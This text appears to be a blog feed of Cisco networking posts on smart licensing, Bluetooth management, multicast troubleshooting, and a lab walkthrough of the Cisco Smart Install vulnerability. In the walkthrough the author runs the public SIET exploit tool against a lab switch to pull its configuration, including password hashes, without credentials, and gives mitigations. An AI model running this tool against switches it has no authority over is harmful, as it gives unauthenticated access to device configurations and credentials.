<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih19pBUrdJe94fTPbat6I0tMRPD5Z8yyEi5jWlNe5Gu77P8GAWUG5emoRPcBNRU9ny5G48tHj2vxrs82LAPyc4DzqGal5OgYitL5CRH2rlHUerHOhRU1H_OKL9eFUwa5L1qYK0r79S9Q2x/s1600/smart-license.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="426" data-original-width="823" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih19pBUrdJe94fTPbat6I0tMRPD5Z8yyEi5jWlNe5Gu77P8GAWUG5emoRPcBNRU9ny5G48tHj2vxrs82LAPyc4DzqGal5OgYitL5CRH2rlHUerHOhRU1H_OKL9eFUwa5L1qYK0r79S9Q2x/s640/smart-license.png" width="640" /></a></div>
<br />
Click on "Request a Smart Account" and follow the instructions.<br />
<br />
<h4>
Create Token</h4>
You will need a "token" that gets pasted into the switch. Once you have your account, log in and click on Smart Licensing in the "License" section:<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTUhJKBGGJwr7Srvb8g0cUE_AW-ZpJibMm3mJIja5IsCpxw8JuZ7xfH1bJECmt33hRgEOq1EtMGd25uygko5sXCVS67B6ge-KsOry1fz7x_jE4P5VmXywyVRr9UGRBpGQeTtP2-KvQCV7E/s1600/smart-license1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="368" data-original-width="411" height="357" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTUhJKBGGJwr7Srvb8g0cUE_AW-ZpJibMm3mJIja5IsCpxw8JuZ7xfH1bJECmt33hRgEOq1EtMGd25uygko5sXCVS67B6ge-KsOry1fz7x_jE4P5VmXywyVRr9UGRBpGQeTtP2-KvQCV7E/s400/smart-license1.png" width="400" /></a></div>
<br />
When the page loads click on the Inventory tab.<br />
<br />
Click the General tab, click "New Token..."<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinGGgNxbeSsumpQwuyiahHJ7cGHKIi7e2fW6hHoIEQFMtlV35X-V4JCOgQisaDz2k_8aYZ_wuyvuHKrs69Alus3xwQScD94DYPp26tFeW2jnQnlM6i_-qMvvXI6oafUHLs1byCk7QqQyE4/s1600/smart-license2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="344" data-original-width="711" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinGGgNxbeSsumpQwuyiahHJ7cGHKIi7e2fW6hHoIEQFMtlV35X-V4JCOgQisaDz2k_8aYZ_wuyvuHKrs69Alus3xwQScD94DYPp26tFeW2jnQnlM6i_-qMvvXI6oafUHLs1byCk7QqQyE4/s640/smart-license2.png" width="640" /></a></div>
<br />
<br />
In the dialog that opens, enter a description and set the number of uses. Cisco recommends 30 and that is what I have been using.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPgqZQtttRsGS-okdFUIVlDGOuKuRZbDPhKueAMEGq6h7mb0IV9jy__8ZLMvalRzEqZP_I2XvyGhI5KV3toZ9jf9AezycTu-y6pjpOqWGozqPigSwI_NRzKoMRKutU-v5oxjt3AfFA0H8R/s1600/smart-license3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="379" data-original-width="802" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPgqZQtttRsGS-okdFUIVlDGOuKuRZbDPhKueAMEGq6h7mb0IV9jy__8ZLMvalRzEqZP_I2XvyGhI5KV3toZ9jf9AezycTu-y6pjpOqWGozqPigSwI_NRzKoMRKutU-v5oxjt3AfFA0H8R/s640/smart-license3.png" width="640" /></a></div>
<br />
<br />
Click "Create Token". You will return to the previous screen. Click on the blue diagonal arrow on the right of the token to copy it to the clipboard. Save the token for use on the switch.<br />
<br />
Enter the Token on the switch<br />
From enable mode, not configuration mode, enter:<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">license smart register idtoken</span><span style="font-family: "courier new" , "courier" , monospace;"> <your token></span></b><br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;"></span></b>and press enter.<br />
<br />
You will see "Registration process is in progress. Use the 'show license status' command to check the progress and result" in the CLI.<br />
<br />
You can use "show license status" to check on the progress. If everything worked you will see:<br />
<br />
Registration:<br />
Status: REGISTERED<br />
<Account name><br />
Virtual Account: DEFAULT<br />
Export-Controlled Functionality: ALLOWED<br />
Initial Registration: SUCCEEDED on Aug 27 13:58:49 2019 PDT<br />
Last Renewal Attempt: None<br />
Next Renewal Attempt: Feb 23 13:58:48 2020 PDT<br />
Registration Expires: Aug 26 13:52:59 2020 PDT<br />
<br />
<h3>
What if it didn't work?</h3>
As you can see, there are a lot of things that must go right for this to work. One thing I have run into is the licenses have to be associated with the switch serial number. If they aren't you will see:<br />
<br />
License Authorization:<br />
Status: OUT OF COMPLIANCE on Aug 27 13:58:53 2019 PDT<br />
Last Communication Attempt: SUCCEEDED on Aug 27 13:58:53 2019 PDT<br />
<br />
On the switch. Back on the portal, click on the "Alerts" tab and you will see:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIZ3cnDzBnbTUoLj_wlEgkTVyRg61GEELKIa21s9W2BTZlzLvXYn2zeXOpJ8Xb66GuY8L2Y_eR5Onf3XJWP-dYwljnDBzlRNygM9ZZhvscHpPmPjk0d0UuFeuHg72zI4hleEQEY-jSOB9V/s1600/smart-license4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="314" data-original-width="827" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIZ3cnDzBnbTUoLj_wlEgkTVyRg61GEELKIa21s9W2BTZlzLvXYn2zeXOpJ8Xb66GuY8L2Y_eR5Onf3XJWP-dYwljnDBzlRNygM9ZZhvscHpPmPjk0d0UuFeuHg72zI4hleEQEY-jSOB9V/s640/smart-license4.png" width="640" /></a></div>
<br />
You will need to contact TAC and get the liscense associated with the switch.<br />
<br />
<br />
If you receive the message<br />
"Operation not supported because the agent is running in Permanent License Reservation mode"<br />
<br />
Run the following<br />
(config)#<b><span style="font-family: "courier new" , "courier" , monospace;">no license smart reservation </span></b><br />
<br />
<br />
<br />
test#sh call-home profile all<br />
<br />
<br />
Profile Name: CiscoTAC-1<br />
Profile status: ACTIVE<br />
Profile mode: Full Reporting<br />
Reporting Data: Smart Call Home, Smart Licensing<br />
Preferred Message Format: xml<br />
Message Size Limit: 3145728 Bytes<br />
Transport Method: http<br />
HTTP address(es): https://tools.cisco.com/its/service/oddce/services/DDCEService<br />
Other address(es): default<br />
<br />
Periodic configuration info message is scheduled every 1 day of the month at 09:15<br />
<br />
Periodic inventory info message is scheduled every 1 day of the month at 09:00<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"> Alert-group Severity<br /> ------------------------ ------------<br /> crash debug<br /> diagnostic minor<br /> environment warning<br /> inventory normal<br /><br /> Syslog-Pattern Severity<br /> ------------------------ ------------<br /> APF-.-WLC_.* warning<br /> .* major</span><br />
<br />
<br />
<b>Show full license status</b><br />
You can use "show license all" to see the complete license status<br />
<br />
<br />
test#<b><span style="font-family: "courier new" , "courier" , monospace;">sh license all</span></b><br />
Smart Licensing Status<br />
======================<br />
<br />
Smart Licensing is ENABLED<br />
<br />
Registration:<br />
Status: REGISTERED<br />
Smart Account: The perfect customer<br />
Virtual Account: DEFAULT<br />
Export-Controlled Functionality: ALLOWED<br />
Initial Registration: SUCCEEDED on Aug 27 13:58:49 2019 PDT<br />
Last Renewal Attempt: SUCCEEDED on Aug 28 09:01:22 2019 PDT<br />
Next Renewal Attempt: Feb 24 09:01:21 2020 PDT<br />
Registration Expires: Aug 27 08:55:36 2020 PDT<br />
<br />
License Authorization:<br />
Status: OUT OF COMPLIANCE on Aug 27 13:58:53 2019 PDT<br />
Last Communication Attempt: SUCCEEDED on Aug 28 09:01:28 2019 PDT<br />
Next Communication Attempt: Aug 28 21:01:28 2019 PDT<br />
Communication Deadline: Nov 26 08:55:44 2019 PDT<br />
<br />
Export Authorization Key:<br />
Features Authorized:<br />
<none><br />
<br />
Utility:<br />
Status: DISABLED<br />
<br />
Data Privacy:<br />
Sending Hostname: yes<br />
Callhome hostname privacy: DISABLED<br />
Smart Licensing hostname privacy: DISABLED<br />
Version privacy: DISABLED<br />
<br />
Transport:<br />
Type: Callhome<br />
<br />
License Usage<br />
==============<br />
<br />
C9300 48P DNA Advantage (C9300-48 DNA Advantage):<br />
Description: C9300 48P DNA Advantage<br />
Count: 4<br />
Version: 1.0<br />
Status: OUT OF COMPLIANCE<br />
Export status: NOT RESTRICTED<br />
<br />
C9300 48P NW Advantage (C9300-48 Network Advantage):<br />
Description: C9300 48P NW Advantage<br />
Count: 4<br />
Version: 1.0<br />
Status: AUTHORIZED<br />
Export status: NOT RESTRICTED<br />
<br />
Product Information<br />
===================<br />
UDI: PID:C9300-48UXM,SN:FJC2324S042<br />
<br />
HA UDI List:<br />
Active:PID:C9300-48UXM,SN:XXXXXXXS042<br />
Standby:PID:C9300-48UXM,SN:XXXXXXXE014<br />
Member:PID:C9300-48UXM,SN:XXXXXXXE04M<br />
Member:PID:C9300-48UXM,SN:XXXXXXXB02D<br />
<br />
Agent Version<br />
=============<br />
Smart Agent for Licensing: 4.8.5.1_rel/8<br />
<br />
Reservation Info<br />
================<br />
License reservation: DISABLED<br />
<br />
<br />
<h3>
<b><span style="font-family: "courier new" , "courier" , monospace;">References</span></b></h3>
<b><span style="font-family: "courier new" , "courier" , monospace;"><a href="https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst9500/software/release/16-9/configuration_guide/sys_mgmt/b_169_sys_mgmt_9500_cg/configuring_smart_licensing.html">Configuring Smart Licensing</a> </span></b><br />
<br />
<br />
<br />
<br />@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com3tag:blogger.com,1999:blog-690329124282786689.post-62484515328632000432019-08-25T22:17:00.001-07:002019-08-25T22:36:02.911-07:00Using Bluetooth with Cisco's Catalyst 9500 With release 16.12.1 Cisco added support for Bluetooth dongles for management. From the release notes:<br />
<br />
<i>The connected dongle acts as a Bluetooth host and serves as a management port connection on the device.</i><br />
<br />
Being able to log on wirelessly using a tiny USB dongle seemed worth some time to figure out. I have an Air-console and it works great but it has to be charged, have a serial to USB cable and is larger than a USB Dongle.<br />
<br />
Where to get a Bluetooth USB dongle<br />
I had my Air-Console laying on the table and remembered that it has a USB Bluetooth dongle. I popped it into my Ubuntu laptop and ran "lsusb" to see what chipset it had:<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">lsusb</span></b><br />
Bus 001 Device 012: ID 0a12:0001 Cambridge Silicon Radio, Ltd Bluetooth Dongle (HCI mode)<br />
<br />
That is a very common chipset and USB dongles with that chipset are available on ebay for around $4. Search for "CSR 4.0 dongle". If it works on the C9500 that would be great.<br />
<br />
Linux has great terminal tools for working with Bluetooth devices. One of them is hciconfig. I ran it to see if the dongle was working on Ubuntu and it was:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>hciconfig</b></span><br />
hci1: Type: Primary Bus: USB<br />
BD Address: 02:BF:28:F8:B1:ED ACL MTU: 310:10 SCO MTU: 64:8<br />
UP RUNNING<br />
RX bytes:730 acl:0 sco:0 events:56 errors:0<br />
TX bytes:4877 acl:0 sco:0 commands:56 errors:0<br />
<br />
My laptop has Bluetooth built in and it mounts as hci0 so the dongle mounted as hci1. You can see the dongle is working.<br />
<br />
<h4>
Does it work on the C9500</h4>
After inserting the dongle I ran:<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">show platform hardware bluetooth</span></b><br />
Controller: 2:bf:28:f8:b1:ed<br />
Type: Primary<br />
Bus: USB<br />
State: UP RUNNING PSCAN ISCAN<br />
Name: BOED-C9500<br />
HCI Version: 4.0<br />
<br />
Looks like the dongle from the Air-Console will work and I can use the $4 dongles off ebay. Notice that the switch reports HCI Version 4.0. HCI stands for Host Controller Interface and is the protocol that allows communiction between the host and the controller (Chipset).<br />
<br />
The PSCAN means Page Scan and ISCAN means Inquiry scan. See the links in the refeences below for more information.<br />
<br />
One thing to note: If you run:<br />
<b><span style="font-family: "Courier New", Courier, monospace;">show interface bluetooth 0/4</span></b><br />
<br />
and there isn't an active Bluetooth connection, it will show Down/Down. You have to use the "show platform hardware bluetooth" to see if the dongle is up.<br />
<br />
<h4>
Configuring the switch</h4>
config t<br />
interface bluetooth 0/4<br />
enable<br />
no shut<br />
exit<br />
<br />
bluetooth pin 1111<br />
end<br />
wr<br />
<br />
This configures the interface and sets a Bluetooth paring PIN of 1111.<br />
<br />
I enabled Bluetooth discovery on my iPhone. I saw a device with the hostname of switch and selected it. It connected but it doesn't show the IP address on the bluetooth info page.<br />
<br />
Back on the switch I ran:<br />
<b><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></b> <b><span style="font-family: "courier new" , "courier" , monospace;">sh int bluetooth 0/4</span></b><br />
<br />
Bluetooth0/4 is up, line protocol is up<br />
Hardware is BT management port, address is 02bf.28f8.b1ed (bia 02bf.28f8.b1ed)<br />
Internet address is 172.16.0.1/24<br />
<br />
I opened Termius on my iPhone and created a host using 172.16.0.1. It connected to the switch and I was in!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk8zZ-y2_Soo1pOACDDIUrq0Rw8NLlcadgXhHcTkhtAvk_z0r11bRpOb5oC1rn0RsNItQ0OrPlmSP0pNMHKlgZlMH38dpgBI608zMESM3fy33aVzN6JXfU8M-FWO_wafPGIR2yPwoVUz7h/s1600/Bluetooth1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="900" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk8zZ-y2_Soo1pOACDDIUrq0Rw8NLlcadgXhHcTkhtAvk_z0r11bRpOb5oC1rn0RsNItQ0OrPlmSP0pNMHKlgZlMH38dpgBI608zMESM3fy33aVzN6JXfU8M-FWO_wafPGIR2yPwoVUz7h/s640/Bluetooth1.png" width="360" /></a></div>
<br />
On the terminal session on my laptop I saw:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>000422: *Aug 25 15:40:08.370: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: cisco] [Source: 172.16.0.2] [localport: 22] at 15:40:08 PDT Sun Aug 25 2019</b></span><br />
<h4>
</h4>
<h4>
Some useful show commands</h4>
show platform hardware bluetooth - Show information about the dongle<br />
show ip interface bluetooth 0/4 - Show IP information<br />
show interface bluetooth 0/4 - Show interface information<br />
<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">show ip interface bluetooth 0/4</span></b><br />
Bluetooth0/4 is up, line protocol is up<br />
Internet address is 172.16.0.1/24<br />
Broadcast address is 255.255.255.255<br />
Address determined by configuration file<br />
MTU is 1500 bytes<br />
Helper address is not set<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">sh int bluetooth 0/4</span></b><br />
Bluetooth0/4 is up, line protocol is up<br />
Hardware is BT management port, address is 02bf.28f8.b1ed (bia 02bf.28f8.b1ed)<br />
Internet address is 172.16.0.1/24<br />
MTU 1500 bytes, BW 1000000 Kbit/sec, DLY 10 usec,<br />
reliability 255/255, txload 1/255, rxload 1/255<br />
Encapsulation ARPA, loopback not set<br />
Keepalive set (10 sec)<br />
<br />
<h3>
</h3>
<h3>
References</h3>
<br />
Cisco's officially supported dongles<br />
The following external USB Bluetooth dongles are supported:<br />
BTD-400 Bluetooth 4.0 Adapter by Kinivo<br />
Bluetooth 4.0 USB Adapter by Asus<br />
Mini Bluetooth Wireless USB 4.0 Dongle Adapter by Adnet<br />
Bluetooth 4.0 USB Adapter by Insignia<br />
<br />
<a href="https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst9500/software/release/16-12/configuration_guide/int_hw/b_1612_int_and_hw_9500_cg/configuring_an_external_usb_bluetooth_dongle.html">Configuring an External USB Bluetooth Dongle</a> - Requires a Cisco CCO login<br />
<a href="https://www.pcsuggest.com/linux-bluetooth-setup-hcitool-bluez/">Linux bluetooth setup with bluez and hcitool</a><br />
<a href="http://dziwior.org/Bluetooth/Paging.html">Bluetooth Page Scan</a><br />
<a href="https://learn.sparkfun.com/tutorials/bluetooth-basics/all">Bluetooth Basic - Sparkfun</a><br />
<br />
<br />@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com1tag:blogger.com,1999:blog-690329124282786689.post-454346367090614612019-05-20T20:44:00.000-07:002019-05-20T20:44:06.842-07:00Attacking the Cisco Smart Install VulnerabilityThe Cisco Smart Install service has been around for a long time, at least back to IOS 12.2.55. It suffers from a serious security vulnerability that allows an unauthenticated user to download the configuration or execute commands on the switch. Cisco released updates in late 2018 to resolve the issue but there are probably millions of switches out there that haven't been upgraded yet.<br />
<br />
Here is an article from the guys that found the exploit <a href="https://embedi.org/blog/cisco-smart-install-remote-code-execution/">https://embedi.org/blog/cisco-smart-install-remote-code-execution/</a>. Their PoC code crashes the switch. As always, a crash is the first step in developing a usable exploit.<br />
<br />
They list the following models as vulnerable:<br />
<br />
<ul>
<li>Catalyst 4500 Supervisor Engines</li>
<li>Catalyst 3850 Series</li>
<li>Catalyst 3750 Series</li>
<li>Catalyst 3650 Series</li>
<li>Catalyst 3560 Series</li>
<li>Catalyst 2960 Series</li>
<li>Catalyst 2975 Series</li>
<li>IE 2000</li>
<li>IE 3000</li>
<li>IE 3010</li>
<li>IE 4000</li>
<li>IE 4010</li>
<li>IE 5000</li>
<li>SM-ES2 SKUs</li>
<li>SM-ES3 SKUs</li>
<li>NME-16ES-1G-P</li>
<li>SM-X-ES3 SKUs</li>
</ul>
<br />
<br />
Notice it includes the Industrial Ethernet series. That's unfortunate given that those switches are likely to be in industrial plants and other locations where an attacker can do real physical damage.<br />
<br />
<br />
My advice is to add "no vstack" to your deployment template unless you are actually using Smart Install. Also, as a Cisco best practice, the switch's management plane should be on a vlan that is only accessible to trusted users.<br />
<br />
There is a working exploit available from this github repository - <a href="https://github.com/Sab0tag3d/SIET/">SIET</a>.<br />
<br />
As you can see in the exploit description, there are several things you can do:<br />
<br />
-t test device for smart install.<br />
-g get device config.<br />
-c change device config.<br />
-u update device IOS.<br />
-e execute commands in the device's console.<br />
-i ip address of target device<br />
-l ip list of targets (file path)<br />
--thread-count number of threads to be spawned<br />
<br />
<h3>
Let's exploit a switch</h3>
As always, do not run this on a switch you don't own or have explicit written permission to.<br />
<br />
<h3>
Is vstack running? </h3>
The tool can quickly check<br />
<br />
->sudo python siet.py -t -i 192.168.10.52<br />
[INFO]: Sending TCP packet to 192.168.10.52<br />
[INFO]: <span style="color: red;">Smart Install Client feature active on 192.168.10.52</span><br />
[INFO]: 192.168.10.52 is affected<br />
<div>
<br /></div>
<br />
If you are logged into a switch there are a couple quick ways to verify<br />
3750x#<b><i>sh tcp brief all </i></b><br />
TCB Local Address Foreign Address (state)<br />
078C6E60 192.168.10.52.22 192.168.10.183.50902 ESTAB<br />
<span style="color: red;">07B162A8 *.4786 *.* LISTEN</span><br />
06FA06BC *.443 *.* LISTEN<br />
06F9FCFC *.443 *.* LISTEN<br />
06F9F33C *.80 *.* LISTEN<br />
06F9E97C *.80 *.* LISTEN<br />
<div>
<br /></div>
<div>
Having port 4786 open means Smart Install is running.</div>
<div>
<br /></div>
<div>
or</div>
<div>
<br /></div>
<div>
<div>
3750x#<b><i>sh vstack config </i></b></div>
<div>
Role: Client (<span style="color: red;">SmartInstall enabled</span>)</div>
<div>
Vstack Director IP address: 0.0.0.0</div>
<div>
<br /></div>
<div>
*** Following configurations will be effective only on director ***</div>
<div>
Vstack default management vlan: 1</div>
<div>
Vstack start-up management vlan: 1</div>
<div>
Vstack management Vlans: none</div>
<div>
Join Window Details:</div>
<div>
<span style="white-space: pre;"> </span> Window: Open (default)</div>
<div>
<span style="white-space: pre;"> </span> Operation Mode: auto (default)</div>
<div>
Vstack Backup Details:</div>
<div>
<span style="white-space: pre;"> </span> Mode: On (default)</div>
<div>
<span style="white-space: pre;"> </span> Repository: </div>
</div>
<div>
<br /></div>
<div>
Note that is says "Vstack default management vlan: 1" but I am successfully attacking on vlan 10.</div>
<br />
So Smart Install is running on a 3750-x in my lab. The switch is running c3750e-universalk9-mz.150-2.SE10. I started out with c3750e-universalk9-tar.152-4.E7 but the switch would reload when I ran the tool with Smart Install enabled. Once I installed c3750e-universalk9-mz.150-2.SE10 I was able to download the full configuration without any credentials or SNMP RW string.<br />
<div>
<div>
<br /></div>
<div>
NOTE: The tool uses its own python tftp server so it will fail if you already have a tftp server running. In my case I had just uploaded the 15.2.SE10 firmware and the tftp server was running. It took me a minute to figure out why the tool was failing:</div>
<div>
[INFO]: binding socket .. error: [Errno 98] Address already in use</div>
<div>
<br /></div>
<h3>
First, let's see who's logged into the switch</h3>
<div>
<br /></div>
<div>
3750x#who</div>
<div>
Line User Host(s) Idle Location</div>
<div>
* 1 vty 0 mhubbard idle 00:00:00 192.168.10.183</div>
<div>
<br /></div>
<h3>
What type of authentication is in use</h3>
<div>
3750x#sh run | sec aaa </div>
<div>
aaa new-model</div>
<div>
aaa group server radius ISE-group</div>
<div>
server name ISE</div>
<div>
!</div>
<div>
<br /></div>
<div>
3750x#test aaa group ISE-group mhubbard ************** new-code </div>
<div>
User successfully authenticated</div>
<div>
<br /></div>
<div>
USER ATTRIBUTES</div>
<div>
<br /></div>
<div>
service-type 0 7 [NAS Prompt]</div>
<div>
Framed-Protocol 0 1 [PPP]</div>
<div>
service-type 0 2 [Framed]</div>
<div>
priv-lvl 0 15 (0xF)</div>
<div>
<br /></div>
<div>
So the switch is using RADIUS authentication and is connected to the RADIUS Server. I know that for sure because my account password had expired and I had to log into my Windows server and change it before I could log into the switch!</div>
<div>
<br /></div>
<h3>
Download the configuration without any credentials</h3>
<div>
Run the Smart Install Exploitation Tool with the "-g" flag to download the configuration:</div>
<div>
<br /></div>
<div>
~/Dropbox/03_Tools/SIET$ </div>
<div>
-><b><i>sudo python siet.py -g -i 192.168.10.52</i></b></div>
<div>
-= DvK =- TFTP server 2017(p)</div>
<div>
[INFO]: Directory already exists. OK.</div>
<div>
[INFO]: binding socket .. ok</div>
<div>
[INFO]: Sending TCP packet to 192.168.10.52 </div>
<div>
[INFO]: Package send success to 192.168.10.52: </div>
<div>
[INFO]: Getting config done</div>
<div>
[INFO]: All done! Waiting 60 seconds for end of connections...</div>
<div>
[INFO]: connect from 192.168.10.52 58422</div>
<div>
[INFO]:[192.168.10.52] puting file 192.168.10.52.conf octet</div>
<div>
[INFO]:[192.168.10.52]:[put] success binding data port 44000</div>
<div>
[INFO]:[192.168.10.52]:[put] <span style="color: red;">file tftp/192.168.10.52.conf finish download, size: 14351</span></div>
<div>
<br /></div>
<h3>
Show the file in SIET's tftp folder</h3>
<div>
mhubbard@1S1K-G5-5587:~/Dropbox/03_Tools/SIET/tftp$ </div>
<div>
->ls -l</div>
<div>
total 20</div>
<div>
-rw-r--r-- 1 root root 14351 May 19 21:53 192.168.10.52.conf</div>
<div>
-rw-r--r-- 1 root root 51 Mar 5 14:33 execute.txt</div>
<div>
<br /></div>
<div>
<br /></div>
<h3>
Display the configuration that was downloaded</h3>
<div>
cat 192.168.10.52.conf </div>
<div>
<br /></div>
<div>
!</div>
<div>
! No configuration change since last restart</div>
<div>
!</div>
<div>
version 15.0</div>
<div>
no service pad</div>
<div>
service timestamps debug datetime msec</div>
<div>
service timestamps log datetime msec</div>
<div>
service password-encryption</div>
<div>
!</div>
<div>
hostname 3750x</div>
<div>
!</div>
<div>
boot-start-marker</div>
<div>
boot-end-marker</div>
<div>
!</div>
<div>
!</div>
<div>
enable secret 5 $1$Ew15$ZstYXs4B38G/T710NavOV1</div>
<div>
!</div>
<div>
username cisco privilege 15 secret 5 $1$llTp$rNcLr9Y7GkG/zVmOdHNVR1</div>
<div>
username hubbard privilege 15 secret 5 $1$5WVT$zWpFHuH2/FdDcQlOOchfS1</div>
<div>
aaa new-model</div>
<div>
!</div>
<div>
!</div>
<div>
aaa group server radius ISE-group</div>
<div>
server name ISE</div>
<div>
!</div>
</div>
<div>
<br /></div>
<h3>
Conclusion</h3>
<div>
Cisco Smart Install is very useful if you support remote sites without IT staff but you must be aware of this vulnerability. If you use the Cisco best practice of ACLing the management plane to only a trusted network you are probably not at much risk until you upgrade.</div>
<div>
<br /></div>
<div>
Speaking of Cisco best practices, the guys that wrote SIET also write a fantastic tool called the Cisco Configuration Analysis Tool (CCAT). It takes your switch config and runs it against the "Hardening Cisco IOS Devices" document and shows all the best practices that you are running and more importantly, any that you are missing.</div>
<div>
<br /></div>
<div>
You can check out the CCAT <a href="https://github.com/cisco-config-analysis-tool/ccat">here</a></div>
<div>
<br /></div>
@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com2tag:blogger.com,1999:blog-690329124282786689.post-2581047638087906752019-04-06T23:01:00.000-07:002019-04-10T22:31:38.795-07:00Troubleshooting Multicast RoutingMulitcast is used for applications like paging and bell systems (Bogen and Valcom for example) and Apple Airplay for screen sharing and Airprint for printing as well as many others. On home networks with one VLAN there are seldom any issues getting the multicast applications to work.<br />
<br />
In an enterprise network with multiple VLANs, the switch must be configured for multicast to be routed correctly. Troubleshooting multicast issues can be time-consuming and without some tools almost impossible.<br />
<br />
Linux has several terminal commands for checking Multicast status of an interface:<br />
<br />
ip maddr show - list all multicast interfaces<br />
<br />
<b>Example:</b><br />
<b><i>ip maddr show</i></b><br />
1:<span style="white-space: pre;"> </span>lo<br />
<span style="white-space: pre;"> </span>inet 224.0.0.251<br />
<span style="white-space: pre;"> </span>inet 224.0.0.1<br />
2:<span style="white-space: pre;"> </span>wlp0s20f3<br />
<span style="white-space: pre;"> </span>inet 224.0.0.251 users 4<br />
<span style="white-space: pre;"> </span>inet 224.0.0.1<br />
<div>
<br /></div>
ip addr show <interface> - Look for MULTICAST<br />
<br />
<b>Example:</b><br />
<b><i>ip addr show wlp0s20f3 </i></b><br />
3: wlp0s20f3: <BROADCAST,<span style="color: red;">MULTICAST</span>,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000<br />
<div>
<br /></div>
ip link show <interface> | grep MULTICAST<br />
<br />
<b>Example:</b><br />
<b><i>ip link show wlp0s20f3 | grep MULTICAST</i></b><br />
3: wlp0s20f3: <BROADCAST,<span style="color: red;">MULTICAST</span>,UP,LOWER_UP> mtu 1500 qdisc mq state UP mode DORMANT group default qlen 1000<br />
<div>
<br /></div>
<div>
Enable/Disable Multicast</div>
sudo ip link set dev <interface> multicast [on|off]<br />
<br />
netstat -g - Lists all multicast interfaces<br />
<br />
<b>Example:</b><br />
netstat -g<br />
IPv6/IPv4 Group Memberships<br />
Interface RefCnt Group<br />
--------------- ------ ---------------------<br />
lo 1 224.0.0.251<br />
lo 1 all-systems.mcast.net<br />
enp60s0 1 all-systems.mcast.net<br />
wlp0s20f3 4 224.0.0.251<br />
wlp0s20f3 1 all-systems.mcast.net<br />
<div>
<br /></div>
<h4>
Pinging Multicast groups</h4>
<div>
<b><i>ping -r -I wlp0s20f3 -t 1 -c 2 224.0.0.1</i></b></div>
<div>
<div>
PING 224.0.0.1 (224.0.0.1) from 192.168.10.183 wlp0s20f3: 56(84) bytes of data.</div>
<div>
64 bytes from 192.168.10.52: icmp_seq=1 ttl=255 time=3.89 ms</div>
<div>
64 bytes from 192.168.10.50: icmp_seq=1 ttl=64 time=4.20 ms (DUP!)</div>
<div>
64 bytes from 192.168.10.51: icmp_seq=1 ttl=64 time=5.50 ms (DUP!)</div>
<div>
64 bytes from 192.168.10.50: icmp_seq=2 ttl=64 time=1.55 ms</div>
</div>
<div>
<br /></div>
<div>
-r - Bypass the normal routing tables and send directly to a host on an attached interface. If the host is not on a directly-attached network, an error is returned. This option can be used to ping a local host through an interface that has no route through it provided the option -I is also used.</div>
<br />
-I - interface is either an address, or an interface name. If interface is an address, it sets source address to specified interface address. If interface is an interface name, it sets source interface to specified interface.<br />
<br />
-t - ttl ping only. Set the IP Time to Live.<br />
<br />
-c - Count<br />
<br />
<br />
On Linux, there are several free open source tools available for testing multicast. In this blog, I am going to demonstrate two tools<br />
mcjoin - Simple multicast testing application for UNIX<br />
omping - Open Multicast ping<br />
<br />
The lab consists of:<br />
Cisco 3750x switch running c3750e-universalk9-mz.152-3.E1 with an IP Services license<br />
Ubuntu 18.04 laptop with IP Address 10.112.40.1/23<br />
Ubuntu 18.04 laptop with IP Address 192.168.10.183/24<br />
<br />
Vlan 10 - 192.168.10.0/24<br />
Vlan 46 - 10.112.40.0.23<br />
<br />
<h3>
m c j o i n - tiny multicast testing tool</h3>
mcjoin is a very simple and easy-to-use tool to test IPv4 and IPv6 multicast. it features:<br />
<br />
an optional multicast generator (server)<br />
an end device that can act as a data sink (client)<br />
supports joining one or more groups:<br />
ASM (*,G) support<br />
SSM (S,G) support<br />
IPv4<br />
IPv6<br />
<br />
<h4>
Installing mcjoin</h4>
Download <span class="pl-2 flex-auto min-width-0 text-bold"><a class="d-flex flex-items-center" href="https://github.com/troglobit/mcjoin/releases/download/v2.4/mcjoin_2.4_amd64.deb" rel="nofollow">mcjoin_2.4_amd64.deb</a> from <a href="https://github.com/troglobit/mcjoin/releases">mcjoin releases</a></span> and double click to install.<br />
<br />
The manual page for mcjoin is very good. Open it by running<br />
<b><i>man mcjoin</i></b><br />
